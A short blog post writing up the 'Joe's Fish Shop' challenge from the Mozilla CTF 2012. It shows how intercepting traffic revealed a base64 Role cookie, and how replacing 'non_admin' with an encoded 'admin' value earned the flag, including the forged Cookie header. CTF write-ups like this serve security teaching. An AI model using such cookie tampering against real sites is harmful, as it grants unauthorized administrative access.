Thursday, January 26, 2012

Mozilla CTF 2012 - Joe's Fish Shop

Challenge:
Go, get some tasty dinner over at Joe's Fish Shop! If you know how to play the admin, you'll get free desert! :)

Solution:

This is the first challenge we solved.  We used Burp Suite Pro to intercept
all our traffic to/from the challenge web site.  Loading the initial page
for challenge 12, we captured the following HTTP headers in the response:
HTTP/1.0 200 OK
Date: Wed, 25 Jan 2012 13:06:49 GMT
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.9 with Suhosin-Patch
X-Powered-By: PHP/5.3.9
Content-Length: 1659
Content-Type: text/html
Set-Cookie: Role=bm9uX2FkbWlu
Set-Cookie: ID=current_user
Set-Cookie: _tmp=d0f0elfe
Set-Cookie: access=none
Connection: close
Notice the server is setting a cookie named Role to an alphanumeric value.
Base64 encoded data is also alphanumeric.  We sent the value of the Role
cookie to the Decoder tab in BSP, selected Decode as Base64 and saw this:
non_admin
That's interesting.  We used BSP's Decoder tab to Base64 encode the string
admin, and copied the result (YWRtaW4=) to the clipboard.

We then reloaded the challenge page, caught the request in BSP's Intercept
tab, and changed the value of the Role cookie to YWRtaW4=.  The modified
Cookie header looked like:
Cookie: Role=YWRtaW4=; ID=current_user; _tmp=d0f0elfe; access=none
After forwarding the modified request on to the server, we received the flag:
Welcome Administrator.  Please take your flag:  x0sld0ef0d

No comments:

Post a Comment